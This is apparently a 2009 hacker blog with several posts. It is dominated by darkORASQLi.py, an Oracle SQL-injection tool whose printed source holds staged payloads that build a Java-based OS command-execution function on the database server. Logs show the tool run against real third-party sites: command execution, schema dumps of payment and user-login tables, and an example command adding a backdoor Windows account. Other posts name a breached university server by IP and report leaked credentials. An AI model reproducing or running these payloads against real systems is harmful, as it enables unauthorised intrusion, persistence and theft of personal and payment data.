Friday, December 4, 2009

Indonesian Attacker Hacked into Open University Malaysia (OUM) Remote Desktop Server

[FULL-DISCLOSURE]

found this from the underground scene.. the attacker known as "tey" from indonesia already breached Open University Malaysia Remote Desktop Server with ip address 202.76.239.24
tey also disclose some proof as concept as below..



Open University Malaysia official site
http://www.oum.edu.my/


p/s: bokep in indonesia means pornographic material if im not mistake.. and wtf!?
p/s/s: wake up! admin.

Wednesday, December 2, 2009

32millions Social Network Account Exposed 3rd Party App Prone to SQL Injection

the message is clear..
dont trust your favorite 3rd party facebook, myspace applications..
32 millions++ credential info like username, email and password (in plaintext yaw!) leaked out in the underground scene..
the responsible provider seems like not walk the talk..
the TOS & Privacy Policy said not to store users password indeed stored it insecure way which is left unencrypted..
luckily, for me, myspaceism is the past, facebook is not my type ;-p

d3ck4 sayz:
1. ) AVOID SOCIAL NETWORKING SITE
2.) USE DIFFERENT USERNAME,EMAIL,PASSWORD FOR EVERY INTERNET ACCOUNT
3.) AVOID SOCIAL NETWORKING SITE ;-)

KID ROCK says:
"twitter is gay!"
http://www.huffingtonpost.com/2009/07/29/kid-rock-twitter-is-gay_n_246818.html

Wednesday, November 11, 2009

Pwning Oracle OS Server with darkORASQLi - Remote Command Execution

Guys! im adding TWO new module/features to darkORASQLi
check this out..
print "    --pwn              Injecting OS command execution function"
print " --cmd Command to exec"

SOURCE CODE:
# Mode --pwn
if mode != "" and mode == "--pwn":
print "[+] This mode is taking advantage of DBMS_EXPORT_EXTENSION vulnerability to run OS command\n[+] Sending our ^EVIL^ pay
loads:\n"

payload1_URL = site.replace("utl_inaddr.get_host_address((darkc0de))","(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
'DBMS_OUTPUT\".PUT(:P1);EXECUTE+IMMEDIATE+''DECLARE+PRAGMA+AUTONOMOUS_TRANSACTION;BEGIN+EXECUTE+IMMEDIATE+''''create+or+replace+and+compil
e+java+source+named+\"LinxUtil\"+as+import+java.io.*;+public+class+LinxUtil+extends+Object+{public+static+String+runCMD(String+args)+{try{Buffered
Reader+myReader=+new+BufferedReader(new+InputStreamReader(+Runtime.getRuntime().exec(args).getInputStream()+)+);+String+stemp,str=\"\";while+(
(stemp+=+myReader.readLine())+!=+null)+str+%2b=stemp%2b\"\\n\";myReader.close();return+str;}+catch+(Exception+e){return+e.toString();}
}public+static+String+readFile(String+filename){try{BufferedReader+myReader=+new+BufferedReader(new+FileReader(filename));+String+stemp,str=\"\"{
; }while+((stemp+=+myReader.readLine())+!=+null)+str+%2b=stemp%2b\"\\n\";myReader.close();return+str;}+catch+(Exception+e){return+e.toStri
ng();}}}'''';END;'';END;--','SYS',0,'1',0)+from+dual)")+arg_end

sys.stdout.write("[+] Stage 1: Creating Java Library ")
source1 = GetThatShit(payload1_URL)
match1 = re.findall("ORA-",source1)
if len(match1) >= 1:
sys.stdout.write("[ FAIL ]\n")
else:
sys.stdout.write("[ OK ]\n")

time.sleep(5)

payload2_URL = site.replace("utl_inaddr.get_host_address((darkc0de))","(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
'DBMS_OUTPUT\".PUT(:P1);EXECUTE+IMMEDIATE+''DECLARE+PRAGMA+AUTONOMOUS_TRANSACTION;BEGIN+EXECUTE+IMMEDIATE+''''begin+dbms_java.grant_permis
sion(+''''''''PUBLIC'''''''',+''''''''SYS:java.io.FilePermission'''''''',+''''''''<>'''''''',+''''''''execute''''''''+);end;'''';END{
; }'';END;--','SYS',0,'1',0)+from+dual)")+arg_end

sys.stdout.write("[+] Stage 2: Granting Java Execute Privileges ")
source2 = GetThatShit(payload2_URL)
match2 = re.findall("ORA-",source2)
if len(match2) >= 1:
sys.stdout.write("[ FAIL ]\n")
else:
sys.stdout.write("[ OK ]\n")

time.sleep(5)

payload3_URL = site.replace("utl_inaddr.get_host_address((darkc0de))","(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
'DBMS_OUTPUT\".PUT(:P1);EXECUTE+IMMEDIATE+''DECLARE+PRAGMA+AUTONOMOUS_TRANSACTION;BEGIN+EXECUTE+IMMEDIATE+''''create+or+replace+function+L
inxRunCMD(p_cmd+in+varchar2)+return+varchar2+as+language+java+name+''''''''LinxUtil.runCMD(java.lang.String)+return+String'''''''';+'''';END{
; }'';END;--','SYS',0,'1',0)+from+dual)")+arg_end

sys.stdout.write("[+] Stage 3: Creating Function for Command Execution ")
source3 = GetThatShit(payload3_URL)
match3 = re.findall("ORA-",source3)
if len(match3) >= 1:
sys.stdout.write("[ FAIL ]\n")
else:
sys.stdout.write("[ OK ]\n")

time.sleep(5)

payload4_URL = site.replace("utl_inaddr.get_host_address((darkc0de))","(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
'DBMS_OUTPUT\".PUT(:P1);EXECUTE+IMMEDIATE+''DECLARE+PRAGMA+AUTONOMOUS_TRANSACTION;BEGIN+EXECUTE+IMMEDIATE+''''grant+all+on+LinxRunCMD+to+p
ublic'''';END;'';END;--','SYS',0,'1',0)+from+dual)")+arg_end

sys.stdout.write("[+] Stage 3: Making Function Executable by All Users ")
source4 = GetThatShit(payload4_URL)
match4 = re.findall("ORA-",source4)
if len(match4) >= 1:
sys.stdout.write("[ FAIL ]\n")
else:
sys.stdout.write("[ OK ]\n")

time.sleep(5)

print "\n[+] If all OK you should now can exec command with --cmd option"
print "[+] Example: \n"
print "[+] Windows"
print "[+] --cmd \"cmd.exe /c net user d3ck4 d4rkc0d3rz /add\"\n"
print "[+] UNIX/Linux"
print "[+] --cmd \"/bin/uname -a\"\n"
sys.exit(1)

# Mode --cmd
elif mode == "--cmd":
print "\n[+] Executing OS command from the server"
count_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||COUNT(sys.LinxRunCMD(\'"+arg_cmd.replace(" ","+")+"\'))||CHR(35)||CHR(58)+FROM+
DUAL")+arg_end
line_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||sys.LinxRunCMD(\'"+arg_cmd.replace(" ","+")+"\')||CHR(35)||CHR(58)+FROM+DUAL")+a
rg_end
arg_row = "Command Lines"

MODULE IN ACTION


--pwn
angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[somevulnsite]/detail.jsp?id=[censored]35'" --pwn

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[somevulnsite]/detail.jsp?id=100[censored]5'
[+] 10:47:52
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored].WORLD
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] This mode is taking advantage of DBMS_EXPORT_EXTENSION vulnerability to run OS command
[+] Sending our ^EVIL^ payloads:

[+] Stage 1: Creating Java Library [ OK ]
[+] Stage 2: Granting Java Execute Privileges [ OK ]
[+] Stage 3: Creating Function for Command Execution [ OK ]
[+] Stage 3: Making Function Executable by All Users [ OK ]

[+] If all OK you should now can exec command with --cmd option
[+] Example:

[+] Windows
[+] --cmd "cmd.exe /c net user d3ck4 d4rkc0d3rz /add"

[+] UNIX/Linux
[+] --cmd "/bin/uname -a"

--cmd "/bin/uname -a"
angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=10[censored]35'" --cmd "/bin/uname -a"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=10[censored]35'
[+] 10:46:54
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi


[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /bin/uname -a
Linux a[censored]n 2.6.9-22.ELsmp #1 SMP Mon Sep 19 18:00:54 EDT 2005 x86_64 x86_64 x86_64 GNU/Linux


[-] 10:46:55
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log
--cmd "/sbin/ifconfig"
angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1[censored]5'" --cmd "/sbin/ifconfig"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1[censored]5'
[+] 10:33:57
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi


[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:11:[censored]:DC
inet addr:10.[censored] Bcast:10.[censored] Mask:255.255.255.0
inet6 addr: 2001:e68:2000:6458:211:25ff:fec4:dddc/64 Scope:Global
inet6 addr: fe80::211:25ff:fec4:dddc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:351166911 errors:0 dropped:0 overruns:0 frame:0
TX packets:393842969 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:63516816827 (59.1 GiB) TX bytes:231324821682 (215.4 GiB)
Interrupt:201

eth1 Link encap:Ethernet HWaddr 00:11:[censored]:DD
inet6 addr: fe80::211:25ff:fec4:dddd/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:209

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:948943 errors:0 dropped:0 overruns:0 frame:0
TX packets:948943 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:93467115 (89.1 MiB) TX bytes:93467115 (89.1 MiB)



[-] 10:34:04
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log

20% to go.. till then, HAPPY HACKING ;-)
- d3ck4 -

Tuesday, November 10, 2009

Howto: Prevent & Remove The World First iPhone Worm "ikee virus" with Rick Astley as Wallpaper

Say ? read all these first mate..

World's first iPhone worm Rickrolls angry fanbois
Hey, jailbreakers: ikee never gonna give you up

http://www.theregister.co.uk/2009/11/08/iphone_worm_rickrolls_users/

The attacks, which researchers say are the world's first iPhone worm in the wild, target jailbroken iPhones that have SSH software installed and keep Apple's default root password of "alpine." In addition to showing a well-coiffed picture of Astley, the new wallpaper displays the message "ikee is never going to give you up," a play on Astley's saccharine addled 1987 hit "Never Gonna Give You Up."

3gs wallpaper changed by an app! Help! (iPhone Rickrol
ling)
http://forums.whirlpool.net.au/forum-replies.cfm?t=1315624

the topic starter say:

So i woke up this morning to find that the wallpaper on my Jailbroken 3GS had been changed to a picture of Rick Astley (some 80's singer?) with the words "ikee is never going to give you up" (the lyrics or title form a song of his)

I have winterboard, and previously had a photo of my partner as the wallpaper. I have tried the following to no avail:

1. Changing the wallpaper back thorugh settings
2. Unticking the "User Wallpaper" option in winterboard – NOTE: this DID remove the picture from the background of my main menu but Rick still appears on my unlock screen.
3. Re-ticking the "User Wallpaper" option in winterboard and changing the wallpaper in settings – rick still appears.

A search of google has turned up nothing, same with the forums.

My guess is one of the apps ive installed has done this and changed something unconfigure-able through the normal settings. Any help is much appreciated. I hate 80s music.

This is my setup:
3GS 16gb
Os 3.1.2 (7D11) on OPTUS
Jailbroken with Blackra1n
Running Cydia, Winterboard and Installous

Interview with ikee (iPhone Virus Creator) - ikee virus removal details enclosed
http://blog.jeltel.com.au/2009/11/interview-with-ikee-iphone-virus.html

ikee say:
[09:05] Secondly i was quite amazed by the number of people who didn't RTFM and change their default passwords.

Hacking Expose say:

To Prevent:
---------------

1. CHANGE DEFAULT ROOT PASSWORD WHICH IS "alphine" AFTER JAILBREAK YOUR IPHONE

To Remove:
---------------

1. OPEN SSH SESSION OR MOBILE-TERMINAL
2. USE COMMAND "RM -RF" TO DELETE, "MAN RM" FOR MORE INFO
3. DELETE THESE FILES AND DIRECTORIES IF ANY AVAILABLE
(for variant A,B,C)
/bin/poc-bbot
/bin/sshpass
/var/log/youcanbeclosertogod.jpg
/var/mobile/LockBackground.jpg (or /var/mobile/Library/LockBackground.jpg)
/System/Library/LaunchDaemons/com.ikey.bbot.plist
/var/lock/bbot.lock
(for variant D, it will overwrite Cydia's file, so reinstall Cydia after removal)
/usr/libexec/cydia/startup
/usr/libexec/cydia/startup.so
/usr/libexec/cydia/startup-helper
/System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist
4. REINSTALL SSH DAEMON

Monday, November 9, 2009

60% Working of darkORASQLi.py - Multi Purpose Oracle SQL Injection Tool

as posted at http://forum.darkc0de.com/index.php?action=vthread&forum=8&topic=11271

hai guys.. during free time, im continuing this project and here some snapshot

#!/usr/bin/python
# 07/11/09 d3ck4, hacking.expose@gmail.com
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Multi-Purpose Oracle SQL Injection Tool
# FUNCTIONS
# *error base using utl_inaddr.get_host_address() function method (default method n happy with it!)
# *refer: http://www.red-database-security.com/whitepaper/oracle_sql_injection_web.html
# *full/current/owner base schema enumeration
# *table and column dump
# *database list extractor
# *owners enumeration
# *general info gathering

# UPCOMING (contribution is most welcome!)
# *auto encode to CHR() to bypass quote escaping in where clause statement
# *blind injection support
# *load file and copy to
# *shell exec
# *--update / --drop / --create / etc..

# FEATURES
# *Round Robin Proxy w/ a proxy list (non-auth or auth proxies)
# *Proxy Auth (works great with Squid w/ basic auth)
# *Random browser agent chosen everytime the script runs
# *debug mode for seeing every URL request, proxy used, browser agent used

# darkc0de Crew
# www.darkc0de.com
# d3ck4, hacking.expose[at]gmail[dot]com

# big credit goes to rsauron, rsauron@gmail.com.
# for the beautiful c0de of darkMySQLi & darkMSSQLi
# d3hydr8 and all the darkc0de cr3w

# Share the c0de!

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --info

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:16:34
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production


[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[-] 22:16:37
[-] Total URL Requests: 3
[-] Done

Don't forget to check darkORASQLi.log

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --dbs

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:16:49
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[1] CBCPR2.[somevulnsite].ORG

[-] 22:16:54
[-] Total URL Requests: 4
[-] Done

Don't forget to check darkORASQLi.log

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --owner

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 5/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:17:00
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing all owners in current database
[+] Number of Owners: 15

[1] RTM
[2] LINXSQL
[3] REBEYOND
[4] DBSNMP
[5] OUTLN
[6] PAY_APP
[7] WATERBIRD
[8] IBA_REPORT
[9] WATCHLIST
[10] IBA_APP
[11] PAYMENT
[12] CBC_APP
[13] APP
[14] SYSTEM
[15] SYS

[-] [22:17:19]
[-] Total URL Requests: 18
[-] Done

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --schema

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:17:33
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing Tables & Columns from current user
[+] Number of Tables: 68

[1] WL_ALERTS: ALERT_ID,ALERT
[2] WL_CATS: CAT_ID,CAT_TITLE,CAT_ORDER
[3] WL_GEO_RANGES: RANGE_ID,RANGE
[4] WL_SPECIES: SPECIES_CODE,COM_NAME,SCI_NAME,COM_NAME_UC,SCI_NAME_UC,TAXON_CODE,COUNTABLE,BOLD,IN_USE,DISPLAY_GROUP,SP,COM_NAME_ALT,ACT
IVE,SCI_NAME_ALT,SORT_AOU,SORT_ABA,SORT_SIBLEY,SORT_THAYER,SORT_CBC,SORT_CBC_ALT1,SORT_CBC_ALT2,COM_NAME_FR,SPECIES_ID
[5] WL_WATCHLIST: WL_ID,ALERT_ID,SPECIES_ID,CAT_ID,RANGE_ID,SPECIES_CODE,POPULATION,IMAGE,PHOTOG_NAME,SUMMARY,IDENT,DIST,MAP,ECOLOGY,THRE
ATS,CONSERV,TODO,REFS,INCOMPLETE
[6] WL_WATCHLIST_BK0920: TODO,POPULATION,REFS,SUMMARY,RANGE_ID,SPECIES_CODE,MAP,ALERT_ID,SPECIES_ID,THREATS,CONSERV,PHOTOG_NAME,WL_ID,CAT
_ID,IMAGE,INCOMPLETE,ECOLOGY,DIST,IDENT

[-] 22:18:52
[-] Total URL Requests: 72
[-] Done

Don't forget to check darkORASQLi.log

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --schema -S all

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:21:30
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing Tables & Columns from all users schema
[+] Number of Tables: 26520

[Owner]: SYS
[Table: Columns]

[1] TAB$: BOBJ,CLUCOLS,CHNCNT,PROPERTY,SPARE3
[2] CLU$: PCTFREE$,MAXTRANS,FUNC
[3] UET$: FILE
[4] SEG$: FILE,EXTSIZE,GROUPS
[5] UNDO$: UGRP,KEEP
[6] TS$: TS,PLUGGED,AFFSTRENGTH
[7] OBJ$: DATAOBJ
[8] IND$: DISTKEY,LBLKKEY,ANALYZETIME,ROWCNT
[9] ICOL$: OBJ,OFFSET,SPARE1
[10] COL$: FIXEDSTORAGE,PROPERTY
[11] USER$: USER,PASSWORD,PTIME,EXPTIME,RESOURCE$,DEFSCHCLASS
[12] PROXY_ROLE_DATA$: ROLE
[13] CON$: OWNER
[14] CDEF$: OBJ,RCON

[Owner]: CBC_APP
[Table: Columns]

[15] CBC_AUX_LOC: LOC_ID,N_LATITUDE_PUB,IRREGULAR
[16] CBC_AUX_RARE_BIRD: OBS_ID


angryleopard:darkc0de d3ck4$ python pg_encode.py PAY_APP
CHR(80)||CHR(65)||CHR(89)||CHR(95)||CHR(65)||CHR(80)||CHR(80)||CHR(10)

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --schema -S "CHR(65)||CHR(80)||C
HR(80)"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:42:23
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing Tables & Columns from user "CHR(65)||CHR(80)||CHR(80)" schema
[+] Number of Tables: 122

[Owner]: APP
[Table: Columns]

[1] PAYMENTS: DONATION,METHOD,AMOUNT,PROJ_ID,PAYMENT_DATE,PAYMENT_ID,USER_ID,COUNT_YR,AUTH_CODE,LOC_ID,NUM_UNITS,PAY_ID
[2] PAYMENTS_GHBAK: DONATION,METHOD,AMOUNT,PROJ_ID,PAYMENT_DATE,PAYMENT_ID,USER_ID,COUNT_YR,AUTH_CODE,LOC_ID,NUM_UNITS
[3] PLAN_TABLE: STATEMENT_ID,TIMESTAMP,REMARKS,OPERATION,OPTIONS,OBJECT_NODE,OBJECT_OWNER,OBJECT_NAME,OBJECT_INSTANCE,OBJECT_TYPE,OPTIMIZ
ER,SEARCH_COLUMNS,ID,PARENT_ID,POSITION,COST,CARDINALITY,BYTES,OTHER_TAG,PARTITION_START,PARTITION_STOP,PARTITION_ID,DISTRIBUTION
[4] PROJECTS: PROJ_ID,URL,DESCRIPTION,P_NAME,OPEN
[5] ROLES: ROLE_DESC,ROLE,ROLE_ID,PROJECT_ID
[6] USERS: HOME_PHONE,EMAIL,ZIP_CODE,STATE,CITY,ADDRESS,LAST_NAME,FIRST_NAME,LAST_UPDATE,CREAT_DATE,ADDRESS_2,USER_ID,COUNTRY,PRIMARY,OPT
_IN,ORGANIZATION,TITLE
[7] USER_CIRCLE_HUMA: FIRST_NAME,LAST_NAME,EMAIL,ABBREV
[8] USER_LOGIN: PASS,LOGIN,USER_ID,LAST_LOGIN
[9] USER_ROLE: USER_ROLE_ID,USER_ID,ROLE_ID,SCOPE_TYPE,SCOPE_VALUE,EXPIRE_DATE
[10] USER_CIRCLE_CBC106: ROLE_ID,LOC_ID,USER_ID,ID,COUNT_YR
[11] USER_CIRCLE_BAK: ROLE_ID,LOC_ID,USER_ID,ID,COUNT_YR
[12] USER_REGION_BAK: ID,USER_ID,REGION_CODE,ROLE_ID
[13] PROJECT_USER_BAK: ROLE_ID,PROJ_ID,USER_ID
[14] USER_ROLE_BAK: USER_ROLE_ID,USER_ID,ROLE_ID,SCOPE_TYPE,SCOPE_VALUE,EXPIRE_DATE
[15] PAYMENTS_BK: DONATION,METHOD,AMOUNT,PROJ_ID,PAYMENT_DATE,PAYMENT_ID,USER_ID,COUNT_YR,AUTH_CODE,LOC_ID,NUM_UNITS,PAY_ID
[16] PLAN_TABLE: OTHER

[-] 22:44:38
[-] Total URL Requests: 126
[-] Done

Don't forget to check darkORASQLi.log

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --dump -T USER_LOGIN -C USER_ID,
LOGIN,PASS

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:46:31
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Dumping data from current database and Table "USER_LOGIN"
[+] and Column(s) ['USER_ID', 'LOGIN', 'PASS']

Seems like we dont have permission to view that table or it never exist!

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --dump -T WL_SPECIES -C SPECIES_
CODE,COM_NAME,SCI_NAME,COM_NAME_UC,SCI_NAME_UC,TAXON_CODE

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:49:04
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Dumping data from current database and Table "WL_SPECIES"
[+] and Column(s) ['SPECIES_CODE', 'COM_NAME', 'SCI_NAME', 'COM_NAME_UC', 'SCI_NAME_UC', 'TAXON_CODE']
[+] Number of Rows: 11756

